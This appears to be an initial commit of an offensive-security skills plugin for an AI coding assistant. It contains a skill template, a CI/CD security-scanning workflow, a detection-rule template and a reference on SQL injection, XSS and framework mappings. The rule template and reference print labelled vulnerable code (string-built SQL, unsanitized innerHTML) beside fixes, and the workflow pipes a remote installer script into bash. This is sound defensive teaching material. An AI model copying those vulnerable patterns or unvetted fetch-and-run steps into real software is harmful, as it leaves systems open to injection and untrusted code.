Initial commit

Zhongwei Li
2025-11-29 17:51:02 +08:00
commit ff1f4bd119
252 changed files with 72682 additions and 0 deletions


@@ -0,0 +1,12 @@
{
"name": "offsec-skills",
"description": "Offensive security skills for penetration testing, network reconnaissance, exploitation, and security assessments",
"version": "0.0.0-2025.11.28",
"author": {
"name": "Sir AppSec",
"email": "sirappsec@gmail.com"
},
"skills": [
"./skills"
]
}

README.md Normal file

@@ -0,0 +1,3 @@
# offsec-skills
Offensive security skills for penetration testing, network reconnaissance, exploitation, and security assessments

plugin.lock.json Normal file (1037 additions)

File diff suppressed because it is too large

skills/_template/SKILL.md Normal file

@@ -0,0 +1,157 @@
---
name: skill-name
description: >
[REQUIRED] Comprehensive description of what this skill does and when to use it.
Include: (1) Primary functionality, (2) Specific use cases, (3) Security operations context.
Must include specific "Use when:" clause for skill discovery.
Example: "SAST vulnerability analysis and remediation guidance using Semgrep and industry
security standards. Use when: (1) Analyzing static code for security vulnerabilities,
(2) Prioritizing security findings by severity, (3) Providing secure coding remediation,
(4) Integrating security checks into CI/CD pipelines."
Maximum 1024 characters.
version: 0.1.0
maintainer: your-github-username
category: [appsec|devsecops|secsdlc|threatmodel|compliance|incident-response]
tags: [relevant, security, tags]
frameworks: [OWASP|CWE|MITRE-ATT&CK|NIST|SOC2]
---
<!--
PROGRESSIVE DISCLOSURE GUIDELINES:
- Keep this SKILL.md file under 500 lines
- Only include core workflows and common patterns here
- Move detailed content to references/ directory
- Link clearly to when references should be consulted
- See: references/WORKFLOW_CHECKLIST.md for workflow pattern examples
- Challenge every sentence: "Does Claude really need this?"
-->
# Skill Name
## Overview
Brief overview of what this skill provides and its security operations context.
## Quick Start
Provide the minimal example to get started immediately:
```bash
# Example command or workflow
tool-name --option value
```
## Core Workflow
### Sequential Workflow
For straightforward step-by-step operations:
1. First action with specific command or operation
2. Second action with expected output or validation
3. Third action with decision points if needed
### Workflow Checklist (for complex operations)
For complex multi-step operations, use a checkable workflow:
Progress:
[ ] 1. Initial setup and configuration
[ ] 2. Run primary security scan or analysis
[ ] 3. Review findings and classify by severity
[ ] 4. Apply remediation patterns
[ ] 5. Validate fixes with re-scan
[ ] 6. Document findings and generate report
Work through each step systematically. Check off completed items.
**For more workflow patterns**, see [references/WORKFLOW_CHECKLIST.md](references/WORKFLOW_CHECKLIST.md)
### Feedback Loop Pattern (for validation)
When validation and iteration are needed:
1. Generate initial output (configuration, code, etc.)
2. Run validation: `./scripts/validator_example.py output.yaml`
3. Review validation errors and warnings
4. Fix identified issues
5. Repeat steps 2-4 until validation passes
6. Apply the validated output
**Note**: Move detailed validation criteria to `references/` if complex.
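For illustration, a minimal sketch of what a validator in this pattern might look like (assumes PyYAML is installed; the required keys are placeholders, not the schema of the bundled `validator_example.py`):
```python
#!/usr/bin/env python3
"""Illustrative validator: checks a YAML config and exits non-zero on errors."""
import sys

import yaml  # assumes PyYAML is available

REQUIRED_KEYS = {"name", "severity_threshold", "rules"}  # placeholder schema

def validate(path: str) -> int:
    errors, warnings = [], []
    try:
        with open(path) as fh:
            config = yaml.safe_load(fh) or {}
    except (OSError, yaml.YAMLError) as exc:
        print(f"ERROR: cannot parse {path}: {exc}")
        return 1
    if not isinstance(config, dict):
        print("ERROR: top-level YAML structure must be a mapping")
        return 1
    for key in sorted(REQUIRED_KEYS - set(config)):
        errors.append(f"missing required key: {key}")
    if config.get("severity_threshold") not in {"LOW", "MEDIUM", "HIGH", "CRITICAL", None}:
        warnings.append("unrecognized severity_threshold value")
    for msg in errors:
        print(f"ERROR: {msg}")
    for msg in warnings:
        print(f"WARNING: {msg}")
    return 1 if errors else 0

if __name__ == "__main__":
    sys.exit(validate(sys.argv[1]))
```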
## Security Considerations
- **Sensitive Data Handling**: Guidance on handling secrets, credentials, PII
- **Access Control**: Required permissions and authorization contexts
- **Audit Logging**: What should be logged for security auditing
- **Compliance**: Relevant compliance requirements (SOC2, GDPR, etc.)
## Bundled Resources
### Scripts (`scripts/`)
Executable scripts for deterministic operations. Use scripts for low-freedom operations requiring consistency.
- `example_script.py` - Python script template with argparse, error handling, and JSON output
- `example_script.sh` - Bash script template with argument parsing and colored output
- `validator_example.py` - Validation script demonstrating feedback loop pattern
**When to use scripts**:
- Deterministic operations that must be consistent
- Complex parsing or data transformation
- Validation and quality checks
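As a rough sketch of the script shape described above (argparse, error handling, JSON output); the bundled `example_script.py` may differ:
```python
#!/usr/bin/env python3
"""Illustrative script skeleton: argparse, basic error handling, JSON output."""
import argparse
import json
import sys

def main() -> int:
    parser = argparse.ArgumentParser(description="Example deterministic operation")
    parser.add_argument("target", help="File to process")
    parser.add_argument("--format", choices=["json", "text"], default="json")
    args = parser.parse_args()

    try:
        with open(args.target) as fh:
            line_count = sum(1 for _ in fh)
    except OSError as exc:
        print(json.dumps({"status": "error", "message": str(exc)}))
        return 1

    result = {"target": args.target, "lines": line_count, "status": "ok"}
    if args.format == "json":
        print(json.dumps(result, indent=2))
    else:
        print(f"{result['target']}: {result['lines']} lines ({result['status']})")
    return 0

if __name__ == "__main__":
    sys.exit(main())
```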
### References (`references/`)
On-demand documentation loaded when needed. Keep SKILL.md concise by moving detailed content here.
- `EXAMPLE.md` - Template for reference documentation with security standards sections
- `WORKFLOW_CHECKLIST.md` - Multiple workflow pattern examples (sequential, conditional, iterative, feedback loop)
**When to use references**:
- Detailed framework mappings (OWASP, CWE, MITRE ATT&CK)
- Advanced configuration options
- Language-specific patterns
- Content exceeding 100 lines
### Assets (`assets/`)
Templates and configuration files used in output (not loaded into context). These are referenced but not read until needed.
- `ci-config-template.yml` - Security-enhanced CI/CD pipeline with SAST, dependency scanning, secrets detection
- `rule-template.yaml` - Security rule template with OWASP/CWE mappings and remediation guidance
**When to use assets**:
- Configuration templates
- Policy templates
- Boilerplate secure code
- CI/CD pipeline examples
## Common Patterns
### Pattern 1: [Pattern Name]
Description and example of common usage pattern.
### Pattern 2: [Pattern Name]
Additional patterns as needed.
## Integration Points
- **CI/CD**: How this integrates with build pipelines
- **Security Tools**: Compatible security scanning/monitoring tools
- **SDLC**: Where this fits in the secure development lifecycle
## Troubleshooting
### Issue: [Common Problem]
**Solution**: Steps to resolve.
## References
- [Tool Documentation](https://example.com)
- [Security Framework](https://owasp.org)
- [Compliance Standard](https://example.com)


@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.


@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << 'EOF'
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC


@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise


@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
// - Direct DOM manipulation (innerHTML, document.write)
// - React dangerouslySetInnerHTML with user data
// - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
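One way to carry these mappings in tool output is a small record type; a hypothetical sketch (field names are illustrative, not a required schema):
```python
from dataclasses import dataclass, field, asdict
import json

@dataclass
class Finding:
    """Illustrative vulnerability record carrying framework mappings."""
    title: str
    severity: str                          # CRITICAL | HIGH | MEDIUM | LOW | INFO
    cwe: list[str] = field(default_factory=list)
    owasp: list[str] = field(default_factory=list)
    location: str = ""

finding = Finding(
    title="SQL injection in user lookup",
    severity="HIGH",
    cwe=["CWE-89"],
    owasp=["A03:2021 - Injection"],
    location="app/views.py:42",
)
print(json.dumps(asdict(finding), indent=2))
```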
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
